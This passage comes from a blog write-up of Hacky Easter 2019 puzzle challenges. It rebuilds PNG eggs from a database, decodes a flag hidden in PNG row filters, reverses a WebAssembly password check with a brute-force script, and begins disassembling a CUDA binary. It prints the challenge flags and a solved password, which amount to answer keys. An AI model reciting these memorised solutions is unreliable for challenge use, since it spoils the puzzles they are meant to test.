AAAACXBIWXMAADRjAAA0YwFVm585         |\n| 4C4D6C0D26924DAD91FE89D3A1070541 |   4 | png.time | AAAAB3RJTUUH4wEaDycfAlGlag==         |\n| AD9A9A93161E4CDA9DFF9C1255D0C0B9 |   5 | png.idat | 11                                   |\n| 4475CA57E03F4BAA9BA447A3B6D545D7 |   6 | png.idat | 11                                   |\n| 7155A2502B6243CB8D14BB67D13649A8 |   7 | png.idat | 11                                   |\n| C8D0E9EC265245B6B0317614B67510C3 |   8 | png.idat | 11                                   |\n| 3A0F84381D4745C99C9CCEEEF329E23B |   9 | png.idat | 11                                   |\n| 32591487AB014FE29D1147A14678F34C |  10 | png.idat | 11                                   |\n| A467DFCACB8F45ADA64892470ABB9BED |  11 | png.idat | 3                                    |\n| D64DE520DFB443098866142539048516 |  12 | png.iend | AAAAAElFTkSuQmCC                     |\n+----------------------------------+-----+----------+--------------------------------------+\n13 rows in set (0.114 sec)\n<\/pre><\/div>\n<br\/>In the above query we already stored the result by <code>ord<\/code>, which defines the sequence of the single child chunks.\n<br\/>\n<br\/>Most of the chunks actually contain base64 encoded data, but the <code>png.idat<\/code> chunks only contain a number. This suggests that there are also nested. We can find the corresponding child elements by using the <code>id<\/code> of the corresponding <code>png.idat<\/code> again:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT HEX(id), ord, type, value FROM Thing WHERE HEX(pid)=&#039;AD9A9A93161E4CDA9DFF9C1255D0C0B9&#039; ORDER BY ord;\n+----------------------------------+-----+----------+---------------------------------------... +\n| HEX(id)                          | ord | type     | value                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            |\n+----------------------------------+-----+----------+---------------------------------------... +\n| 35A333B3EA0242D7A316CF2387F5A1B2 |   0 | png.idat | AAAgAElEQVR42uydeXykRZ3\/3\/V0d7pzTjKZzE... |\n| CA2FF632076D4FAD9FE020031CEFE701 |   1 | png.idat | iW9B\/rSno\/vlujdqaALW0DgFsLE3\/GkhxD8CgX... |\n| 3F2B4364061E473581D054824AD18653 |   2 | png.idat | jq5VenRoaALW0CiP6n25Bd8AZpVaVkvTHL7R+t... |\n| 3DE98E5C77BE4F2FA437CD6C9047E96E |   3 | png.idat | V5+zy7z3CeWyU9\/JN5e8kyXzFpXSBVd39kWe1i... |\n\n<\/pre><\/div>\n<br\/>These <code>png.idat<\/code> entries actually contain data.\n<br\/>\n<br\/>In order to reconstruct the images, we first create a MySQL function, which retrieves the binary data of a chunk by base64 decoding the <code>value<\/code> field and retrieving all child elements for a <code>png.idat<\/code> chunk:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; DELIMITER $$\nMariaDB &#x5B;EveryThing]&gt; CREATE FUNCTION GetData(hexid varchar(255)) RETURNS BLOB\n    -&gt;   BEGIN\n    -&gt;   DECLARE t varchar(255);\n    -&gt;   DECLARE b BLOB;\n    -&gt;   SELECT type into t FROM Thing WHERE HEX(id) = hexid;\n    -&gt;   IF t = &#039;png.idat&#039; THEN\n    -&gt;     SELECT GROUP_CONCAT(FROM_BASE64(value) ORDER BY ord SEPARATOR &#039;&#039;) INTO b FROM Thing WHERE HEX(pid)=hexid;\n    -&gt;   ELSE SELECT FROM_BASE64(value) INTO b FROM Thing WHERE HEX(id) = hexid;\n    -&gt;   END IF;\n    -&gt;   RETURN b;\n    -&gt;   END$$\nQuery OK, 0 rows affected (0.001 sec)\n\nMariaDB &#x5B;EveryThing]&gt; DELIMITER ;\n<\/pre><\/div>\n<br\/>Notice that for a <code>png.idat<\/code> chunk we need to retrieve the data from all child chunks and for every other chunk we can simple base64 decode the <code>value<\/code> field.\n<br\/>\n<br\/>Now we can use this function in order to dump all png images:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nMariaDB &#x5B;EveryThing]&gt; SELECT GROUP_CONCAT(GetData(HEX(id)) ORDER BY ord SEPARATOR &#039;&#039;) FROM Thing WHERE HEX(pid)=&#039;1BD4209D9C664967AA7944E2ED2FC96C&#039; INTO DUMPFILE &#039;\/tmp\/1.png&#039;;\nQuery OK, 1 row affected (2.042 sec)\n\nMariaDB &#x5B;EveryThing]&gt; SELECT GROUP_CONCAT(GetData(HEX(id)) ORDER BY ord SEPARATOR &#039;&#039;) FROM Thing WHERE HEX(pid)=&#039;35FD7ABC15274E38A513F990D153FC37&#039; INTO DUMPFILE &#039;\/tmp\/2.png&#039;;\nQuery OK, 1 row affected (1.788 sec)\n\nMariaDB &#x5B;EveryThing]&gt; SELECT GROUP_CONCAT(GetData(HEX(id)) ORDER BY ord SEPARATOR &#039;&#039;) FROM Thing WHERE HEX(pid)=&#039;42097903161D41839D5D189B93E580D7&#039; INTO DUMPFILE &#039;\/tmp\/3.png&#039;;\nQuery OK, 1 row affected (1.811 sec)\n\n...\n<\/pre><\/div>\n<br\/>After a few false eggs &#8230;\n<br\/>\n<br\/><table><tr><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_01.png\" width=\"200\"\/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_02.png\" width=\"200\"\/><\/td><td><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_03.png\" width=\"200\"\/><\/td><td style=\"font-size:36px;\">&#8230;<\/td><\/tr><\/table>\n<br\/>\n<br\/>&#8230; we find the actual egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg16_04.png\" width=\"200\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-qKaG-VHmv-Mm26-0mwy<\/span>.\n<br\/>\n<h1 id=\"chlg17\">17 &#8211; New Egg Design<\/h1>\nThe provided image displays an egg with a circuit diagram of an electronic <a href=\"https:\/\/en.wikipedia.org\/wiki\/High-pass_filter\" target=\"_new\" rel=\"noopener noreferrer\">high-pass filter<\/a>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg17_01.png\" width=\"300\"\/>\n<br\/>\n<br\/>Also, the challenge description states that this challenge is about <i>filters<\/i>. As this are not enough filters yet, the image of challenge displays a QR code, which was made illegible by applying a <i>mosaic filter<\/i>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg17_02.jpg\" width=\"600\"\/>\n<br\/>\n<br\/>After the challenge was not solved by anyone on the 18th of april, a hint was added:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg17_03.png\" width=\"500\"\/>\n<br\/>\n<br\/>My slight assumption was, that the challenge probably has to do something with <i>filters<\/i>. Though, I was really in the dark on this. I mainly focused on trying to find some information hidden within the RGBA values without any success.\n<br\/>\n<br\/>When analyzing the png structure of the image, I compared the output of <code>pngcheck<\/code> on the image &#8230;\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg17# pngcheck -v eggdesign.png\nFile: eggdesign.png (62643 bytes)\n  chunk IHDR at offset 0x0000c, length 13\n    480 x 480 image, 32-bit RGB+alpha, non-interlaced\n  chunk gAMA at offset 0x00025, length 4: 0.45455\n  chunk cHRM at offset 0x00035, length 32\n    White x = 0.3127 y = 0.329,  Red x = 0.64 y = 0.33\n    Green x = 0.3 y = 0.6,  Blue x = 0.15 y = 0.06\n  chunk pHYs at offset 0x00061, length 9: 13410x13410 pixels\/meter (341 dpi)\n  chunk tIME at offset 0x00076, length 7:  6 Jan 2019 09:27:56 UTC\n  chunk tEXt at offset 0x00089, length 24, keyword: Software\n  chunk IDAT at offset 0x000ad, length 8192\n    zlib: deflated, 32K window, default compression\n  chunk IDAT at offset 0x020b9, length 8192\n  chunk IDAT at offset 0x040c5, length 8192\n  chunk IDAT at offset 0x060d1, length 8192\n  chunk IDAT at offset 0x080dd, length 8192\n  chunk IDAT at offset 0x0a0e9, length 8192\n  chunk IDAT at offset 0x0c0f5, length 8192\n  chunk IDAT at offset 0x0e101, length 5022\n  chunk IEND at offset 0x0f4ab, length 0\nNo errors detected in eggdesign.png (15 chunks, 93.2% compression).\n\n<\/pre><\/div>\n<br\/>&#8230; with another egg (in this case from challenge 11):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg17# pngcheck -v ..\/egg11\/2b8c672e9759bd56ab1702dcee0e109182374b8c.png\nFile: ..\/egg11\/2b8c672e9759bd56ab1702dcee0e109182374b8c.png (66058 bytes)\n  chunk IHDR at offset 0x0000c, length 13\n    480 x 480 image, 32-bit RGB+alpha, non-interlaced\n  chunk gAMA at offset 0x00025, length 4: 0.45455\n  chunk cHRM at offset 0x00035, length 32\n    White x = 0.3127 y = 0.329,  Red x = 0.64 y = 0.33\n    Green x = 0.3 y = 0.6,  Blue x = 0.15 y = 0.06\n  chunk bKGD at offset 0x00061, length 6\n    red = 0x00ff, green = 0x00ff, blue = 0x00ff\n  chunk pHYs at offset 0x00073, length 9: 13411x13411 pixels\/meter (341 dpi)\n  chunk tIME at offset 0x00088, length 7: 12 Jan 2019 05:50:49 UTC\n  chunk IDAT at offset 0x0009b, length 32768\n    zlib: deflated, 32K window, maximum compression\n  chunk IDAT at offset 0x080a7, length 32768\n  chunk IDAT at offset 0x100b3, length 189\n  chunk tEXt at offset 0x1017c, length 37, keyword: date:create\n  chunk tEXt at offset 0x101ad, length 37, keyword: date:modify\n  chunk tEXt at offset 0x101de, length 24, keyword: Software\n  chunk IEND at offset 0x10202, length 0\nNo errors detected in ..\/egg11\/2b8c672e9759bd56ab1702dcee0e109182374b8c.png (13 chunks, 92.8% compression).\n<\/pre><\/div>\n<br\/>I noticed that the structure differs and the image of this challenge especially has more <code>IDAT<\/code> chunks. Though, I could not make any use of this information until I got a hint that the version of <code>pngcheck<\/code> from the default repository lacks some information in the output. Thus I downloaded <code>pngcheck<\/code> from <a href=\"https:\/\/directory.fsf.org\/wiki\/Pngcheck\" target=\"_new\" rel=\"noopener noreferrer\">here<\/a>. In order to compile it, we have to add the path to the shared library <code>libz.a<\/code> in the makefile:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\nroot@kali:~\/Downloads\/pngcheck-2.3.0# locate libz.a\n\/usr\/lib\/x86_64-linux-gnu\/libz.a\nroot@kali:~\/Downloads\/pngcheck-2.3.0# cat Makefile.unx\n...\n\n# macros --------------------------------------------------------------------\n\nZPATH = \/usr\/lib\/x86_64-linux-gnu\/ # ADJUSTED THIS LINE\nZINC = -I$(ZPATH)\n...\n<\/pre><\/div>\n<br\/>Now we can compile the program:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Downloads\/pngcheck-2.3.0# make -f Makefile.unx\ngcc -O -Wall -I\/usr\/lib\/x86_64-linux-gnu\/ -DUSE_ZLIB -o pngcheck pngcheck.c \/usr\/lib\/x86_64-linux-gnu\/\/libz.a\n...\n\n<\/pre><\/div>\n<br\/>This version offers not only verbosely output (<code>-v<\/code>), but also very verbosely output (<code>-vv<\/code>):\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; highlight: [21]; title: ; notranslate\" title=\"\">\nroot@kali:~\/Downloads\/pngcheck-2.3.0# .\/pngcheck\nPNGcheck, version 2.3.0 of 7 July 2007,\n   by Alexander Lehmann, Andreas Dilger and Greg Roelofs.\n   Compiled with zlib 1.2.11; using zlib 1.2.11.\n\nTest PNG, JNG or MNG image files for corruption, and print size\/type info.\n\nUsage:  pngcheck &#x5B;-7cfpqtv] file.{png|jng|mng} &#x5B;file2.{png|jng|mng} &#x5B;...]]\n   or:  ... | pngcheck &#x5B;-7cfpqstvx]\n   or:  pngcheck &#x5B;-7cfpqstvx] file-containing-PNGs...\n\nOptions:\n   -7  print contents of tEXt chunks, escape chars &gt;=128 (for 7-bit terminals)\n   -c  colorize output (for ANSI terminals)\n   -f  force continuation even after major errors\n   -p  print contents of PLTE, tRNS, hIST, sPLT and PPLT (can be used with -q)\n   -q  test quietly (output only errors)\n   -s  search for PNGs within another file\n   -t  print contents of tEXt chunks (can be used with -q)\n   -v  test verbosely (print most chunk data)\n   -vv test very verbosely (decode &amp; print line filters)\n   -w  suppress windowBits test (more-stringent compression check)\n   -x  search for PNGs within another file and extract them when found\n\nNote:  MNG support is more informational than conformance-oriented.\n<\/pre><\/div>\n<br\/>Applying this on the provided image removed the scales from my eyes:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Downloads\/pngcheck-2.3.0# .\/pngcheck -vv ~\/Documents\/he19\/egg17\/eggdesign.png\nFile: \/root\/Documents\/he19\/egg17\/eggdesign.png (62643 bytes)\n  chunk IHDR at offset 0x0000c, length 13\n    480 x 480 image, 32-bit RGB+alpha, non-interlaced\n  chunk gAMA at offset 0x00025, length 4: 0.45455\n  chunk cHRM at offset 0x00035, length 32\n    White x = 0.3127 y = 0.329,  Red x = 0.64 y = 0.33\n    Green x = 0.3 y = 0.6,  Blue x = 0.15 y = 0.06\n  chunk pHYs at offset 0x00061, length 9: 13410x13410 pixels\/meter (341 dpi)\n  chunk tIME at offset 0x00076, length 7:  6 Jan 2019 09:27:56 UTC\n  chunk tEXt at offset 0x00089, length 24, keyword: Software\n  chunk IDAT at offset 0x000ad, length 8192\n    zlib: deflated, 32K window, default compression\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 0 0 0 0 1 1 0 1 1 0 1 1 1 1 0 1 1 0 1 1 1 0 0\n      1 1 0 0 1 1 1 0 1 1 1 0 0 1 0 0 1 1 0 0 0 0 1 0 1\n      1 1 0 1 0 0 0 1 1 1 0 1 0 1 0 1 1 0 1 1 0 0 0 1 1\n      0 0 0 0 1 0 1 1 1 (84 out of 480)\n  chunk IDAT at offset 0x020b9, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 0 0 0 1 1 0 1 0 0 1 0 1 1 0 1 1 1 1 0 1 1 0 1\n      1 1 0 0 0 1 0 1 1 0 0 0 0 1 0 0 0 0 0 0 1 1 0 1 0\n      0 0 (136 out of 480)\n  chunk IDAT at offset 0x040c5, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 1 0 0 1 0 1 0 1 1 1 0 0 1 0 0 1 1 0 0 1 0 1 0\n      0 1 0 0 0 0 0 0 1 1 0 1 0 0 1 0 1 1 1 0 0 (182 out of 480)\n  chunk IDAT at offset 0x060d1, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      1 1 0 0 1 0 0 0 0 0 0 1 1 1 1 0 0 1 0 1 1 0 1 1 1\n      1 0 1 1 1 0 1 0 1 0 1 1 1 0 0 1 0 0 0 1 0 0 0 0 0\n      0 1 1 0 0 1 1 0 0 (241 out of 480)\n  chunk IDAT at offset 0x080dd, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      1 1 0 1 1 0 0 0 1 1 0 0 0 0 1 0 1 1 0 0 1 1 1 0 0\n      1 1 1 0 1 0 0 0 1 0 0 0 0 0 0 1 1 0 1 0 0 0 0 1 1\n      0 (292 out of 480)\n  chunk IDAT at offset 0x0a0e9, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 0 1 0 0 1 1 0 0 0 1 0 0 1 1 1 0 0 1 0 0 1 0 1\n      1 0 1 0 1 0 1 0 1 0 0 0 1 0 0 1 0 1 1 0 1 1 0 1 0\n      0 1 0 1 1 0 1 0 0 1 0 0 1 0 1 1 0 1 0 0 1 1 (364 out of 480)\n  chunk IDAT at offset 0x0c0f5, length 8192\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 0 1 0 0 1 1 0 0 0 0 1 0 1 0 1 0 1 1 0 0 1 1 0 0\n      0 0 1 0 0 1 0 1 1 0 1 0 1 1 0 0 0 1 1 0 1 0 0 1 0\n      1 1 0 1 0 0 1 0 1 0 (424 out of 480)\n  chunk IDAT at offset 0x0e101, length 5022\n    row filters (0 none, 1 sub, 2 up, 3 avg, 4 paeth):\n      0 1 1 0 1 1 1 1 0 0 1 0 1 1 0 1 0 0 1 1 1 0 0 1 0\n      1 0 1 0 0 0 1 0 1 0 0 0 0 1 1 0 1 1 0 1 0 1 0 0 0\n      0 0 0 0 0 0 (480 out of 480)\n  chunk IEND at offset 0x0f4ab, length 0\nNo errors detected in \/root\/Documents\/he19\/egg17\/eggdesign.png (15 chunks, 93.2% compression).\n<\/pre><\/div>\n<br\/>Filters! Finally! The only thing left to do is to convert the bit stream to ASCII:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg17# python\nPython 2.7.15+ (default, Feb  3 2019, 13:13:16)\n&#x5B;GCC 8.2.0] on linux2\nType &quot;help&quot;, &quot;copyright&quot;, &quot;credits&quot; or &quot;license&quot; for more information.\n&gt;&gt;&gt; import binascii\n&gt;&gt;&gt; bitstream = int(&#039;010000110110111101101110011001110111001001100001011101000111010101101...&#039;, 2)\n&gt;&gt;&gt; binascii.unhexlify(&#039;%x&#039; % bitstream)\n&#039;Congratulation, here is your flag: he19-TKii-2aVa-cKJo-9QCj\\x00&#039;\n\n<\/pre><\/div>\n<br\/>The flag is <span class=\"spanFlag\">he19-TKii-2aVa-cKJo-9QCj<\/span>.\n<br\/>\n<h1 id=\"chlg18\">18 &#8211; Egg Storage<\/h1>\nThe challenge description provides a link to the following website:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_01.png\" width=\"700\"\/>\n<br\/>\n<br\/>The input field requires exactly 24 characters to be entered. When entering some garbage, a broken egg is displayed:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_02.png\" width=\"700\"\/>\n<br\/>\n<br\/>By viewing the source code we can see that the javascript is using <a href=\"https:\/\/en.wikipedia.org\/wiki\/WebAssembly\" target=\"_new\" rel=\"noopener noreferrer\">WebAssembly<\/a>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\n...\n\nfunction compileAndRun() {\n    WebAssembly.instantiate(content, {\n        base: {\n            functions: nope\n        }\n    }).then(module =&gt; callWasm(module.instance));\n}\n\ncompileAndRun();\n<\/pre><\/div>\n<br\/>\n<br\/>The javascript source code also contains a loop, which executes the <code>debugger<\/code> statement 100-times:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\nfunction nope() {\n    for (let i = 0; i &lt; 100; i++) {\n        debugger;\n    }\n\n    return 1337;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>This statement stops the execution, if the debugger is turned on. This means that we would have to click 100 times to get past this loop, when we want to debug the code after the loop. In order to bypass this, we can simply download the whole page and comment out the loop:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: jscript; gutter: false; title: ; notranslate\" title=\"\">\nfunction nope() {\n    \/*for (let i = 0; i &lt; 100; i++) {\n        debugger;\n    }*\/\n\n    return 1337;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>If we open the debugger in our browser (e.g. <code>Chrome<\/code>) and click on <code>Validate<\/code> now, we can see that there are three WebAssembly functions: <code>wasm-d986c06a-1<\/code>, <code>wasm-d986c06a-2<\/code> and <code>wasm-d986c06a-3<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_03.png\" width=\"900\"\/>\n<br\/>\n<br\/>We can now set a breakpoint within the WebAssembly code and single step through the code:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_04.png\" width=\"900\"\/>\n<br\/>\n<br\/>Stepping through the code and inspecting the effect of each instruction helps to better understand what the code does.\n<br\/>\n<br\/>Basically WebAssembly is quite easy to read. The stack plays a very important role since operations are not carried out in registers but on the stack. If we want to add two values, we push both of them on the stack and call the add instruction. This instructions pops both values from the stack and pushes the result onto it. This is how each instructions is working.\n<br\/>\n<br\/>Keeping this into mind, we can reverse the WebAssembly into the following pseudo code:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; title: ; notranslate\" title=\"\">\n\/\/ input = 24 characters\n\nint validatePassword(input) {\n\n  for (i = 4; i &lt; 24; i++) {\n    if (input&#x5B;i] not in &#x5B;&#039;0&#039;,&#039;1&#039;,&#039;3&#039;,&#039;4&#039;,&#039;5&#039;,&#039;H&#039;,&#039;L&#039;,&#039;X&#039;,&#039;c&#039;,&#039;d&#039;,&#039;f&#039;,&#039;r&#039;]) return 0;\n  }\n\n  if (input&#x5B;0] != &#039;T&#039;) return 0;\n  if (input&#x5B;1] != &#039;h&#039;) return 0;\n  if (input&#x5B;2] != &#039;3&#039;) return 0;\n  if (input&#x5B;3] != &#039;P&#039;) return 0;\n\n  if (input&#x5B;23] != input&#x5B;17]) return 0;\n  if (input&#x5B;12] != input&#x5B;16]) return 0;\n  if (input&#x5B;22] != input&#x5B;15]) return 0;\n\n  if ((input&#x5B;5] - input&#x5B;7]) != 14) return 0;\n  if ((input&#x5B;14]+1) != input&#x5B;15]) return 0;\n  if ((input&#x5B;9]%input&#x5B;8]) != 40) return 0;\n  if ((input&#x5B;5]-input&#x5B;9]+input&#x5B;19]) != 79) return 0;\n  if ((input&#x5B;7]-input&#x5B;14]) != input&#x5B;20]) return 0;\n  if ((input&#x5B;9]%input&#x5B;4])*2 != input&#x5B;13]) return 0;\n  if ((input&#x5B;13]%input&#x5B;6]) != 20) return 0;\n  if ((input&#x5B;11]%input&#x5B;13]) != (input&#x5B;21]-46)) return 0;\n  if ((input&#x5B;7]%input&#x5B;6]) != input&#x5B;10]) return 0;\n  if ((input&#x5B;23]%input&#x5B;22]) != 2) return 0;\n\n  x = 0;\n  y = 0;\n  for (i = 4; i &lt; 24; i++) {\n    x += input&#x5B;i];\n    y ^= input&#x5B;i];\n  }\n\n  if (x != 1352) return 0;\n  if (y != 44) return 0;\n\n  return 1;\n}\n<\/pre><\/div>\n<br\/>\n<br\/>As it turned out, there are several checks made on each of the character from the given input. Obviously the password is supposed to start with <code>Th3P<\/code>. All following characters are supposed to be one of the following: <code>0<\/code>, <code>1<\/code>, <code>3<\/code>, <code>4<\/code>, <code>5<\/code>, <code>H<\/code>, <code>L<\/code>, <code>X<\/code>, <code>c<\/code>, <code>d<\/code>, <code>f<\/code>, <code>r<\/code>. This greatly reduces the possible password space. Though, the other requirements are not so easy to grasp. In order to find the valid password, we can write a python script, which bruteforces it:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: python; title: ; notranslate\" title=\"\">\n#!\/usr\/bin\/env python\n\nalpha = &#039;01345HLXcdfr&#039;\npwd   = &#039;Th3P&#039;\n\nfor c4 in &#039;01345HLXcdfr&#039;:\n  for c5 in alpha:\n    for c6 in alpha:\n      for c7 in alpha:\n        if (ord(c5) - ord(c7) != 14): continue\n        for c8 in alpha:\n          for c9 in alpha:\n            if (ord(c9)%ord(c8) != 40): continue\n            for c10 in alpha:\n              if (ord(c7)%ord(c6) != ord(c10)): continue\n              for c11 in alpha:\n                for c12 in alpha:\n                  for c13 in alpha:\n                    if (ord(c13)%ord(c6) != 20): continue\n                    if ((ord(c9)%ord(c4))*2 != ord(c13)): continue\n                    for c14 in alpha:\n                      for c15 in alpha:\n                        if ((ord(c14)+1) != ord(c15)): continue\n                        c16 = c12\n                        for c17 in alpha:\n                          for c18 in alpha:\n                            for c19 in alpha:\n                              if (ord(c5)-ord(c9)+ord(c19) != 79): continue\n                              for c20 in alpha:\n                                if (ord(c7)-ord(c14) != ord(c20)): continue\n                                for c21 in alpha:\n                                  if (ord(c11)%ord(c13) != ord(c21)-46): continue\n                                  c22 = c15\n                                  c23 = c17\n                                  if (ord(c23)%ord(c22) != 2): continue\n                                  x = 0\n                                  y = 0\n                                  p = pwd+c4+c5+c6+c7+c8+c9+c10+c11+c12+c13+c14+c15+c16+c17+c18+c19+c20+c21+c22+c23\n                                  for i in range(4, 24):\n                                    x += ord(p&#x5B;i])\n                                    y ^= ord(p&#x5B;i])\n                                  if (x != 1352): continue\n                                  if (y != 44): continue\n                                  print(p)\n<\/pre><\/div>\n<br\/>\n<br\/>Running the script almost instantly outputs the password:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nroot@kali:~\/Documents\/he19\/egg18# .\/bruteforce.py\nTh3P4r4d0X0fcH01c3154L13\n<\/pre><\/div>\n<br\/>\n<br\/>Entering the password <code>Th3P4r4d0X0fcH01c3154L13<\/code> into the input field yields the egg:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg18_05.png\" width=\"700\"\/>\n<br\/>\n<br\/>The flag is <span class=\"spanFlag\">he19-DJXj-nL5q-BrfK-7z1x<\/span>.\n<br\/>\n<h1 id=\"chlg19\">19 &#8211; CoUmpact DiAsc<\/h1>\nThe challenge provides a binary called <code>coumpactdiasc<\/code>. In order to run this binary probably, <a href=\"https:\/\/developer.nvidia.com\/cuda-downloads\" target=\"_new\" rel=\"noopener noreferrer\">Nvidia CUDA<\/a> is required.\n<br\/>\n<br\/>After having setup CUDA, we can run the program, which prompts for a password:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ .\/coumpactdiasc\nEnter Password: test\n<\/pre><\/div>\n<br\/>The program created a file called <code>egg<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ file egg\negg: data\n<\/pre><\/div>\n<br\/>Which seems to be garbage:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ hexdump -C egg | head\n00000000  0a 14 d4 ab 8a 26 5f df  eb b7 56 f1 ee 9c 75 7c  |.....&amp;_...V...u||\n00000010  c6 be 8a 20 8b 9b 5f a4  4e ef bf 11 6d c3 60 ee  |... .._.N...m.`.|\n00000020  8e 59 bc bb f4 b0 7a d6  7b 04 6b 08 38 32 46 2f  |.Y....z.{.k.82F\/|\n00000030  11 ad af 94 3e 21 f9 01  69 82 09 0b 1d 0e ed 41  |....&gt;!..i......A|\n00000040  f0 86 60 1b 04 2c 60 59  8e 05 b5 d1 ca 2c 40 f3  |..`..,`Y.....,@.|\n00000050  0f 68 b0 c7 2f 29 39 38  6d 20 07 38 56 9b 72 74  |.h..\/)98m .8V.rt|\n00000060  3d c1 19 63 43 2a 26 da  84 be d3 16 01 74 df 66  |=..cC*&amp;......t.f|\n00000070  fd 5a b2 80 48 10 12 0d  ab 53 43 df 05 bb e8 a7  |.Z..H....SC.....|\n00000080  f9 1d a9 32 60 f6 8d 07  68 c1 f0 dc 2e 02 51 aa  |...2`...h.....Q.|\n00000090  fe e8 82 df 07 9c 7b 3f  82 6e 2a 31 c9 1f b1 be  |......{?.n*1....|\n<\/pre><\/div>\n<br\/>The description of the challenge also contains a hint for the password (we will get back to this later):\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg19_01.jpg\" width=\"400\"\/>\n<br\/>\n<br\/>I started by analyzing the binary in <code>ghidra<\/code>:\n<br\/>\n<br\/><img decoding=\"async\" src=\"https:\/\/devel0pment.de\/wp-content\/uploads\/2019\/06\/he19_egg19_02.png\" width=\"1200\"\/>\n<br\/>\n<br\/>This part of program does not very much. It simple reads up to <code>0x11<\/code> bytes a password from <code>stdin<\/code>, initializes a few CUDA buffers and run three different CUDA function (<code>f13<\/code>, <code>f3<\/code> and <code>f12<\/code>). At last one of the CUDA buffers is written to the file <code>egg<\/code>.\n<br\/>\n<br\/>In order to determine, what these CUDA functions does, I disassembled them using <code>cuobjdump<\/code>:\n<br\/><div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nuser@h0st:~\/Documents\/he19\/egg19$ \/usr\/local\/cuda-10.1\/bin\/cuobjdump coumpactdiasc -sass\n\nFatbin elf code:\n================\narch = sm_30\ncode version = &#x5B;1,7]\nproducer = &lt;unknown&gt;\nhost = linux\ncompile_size = 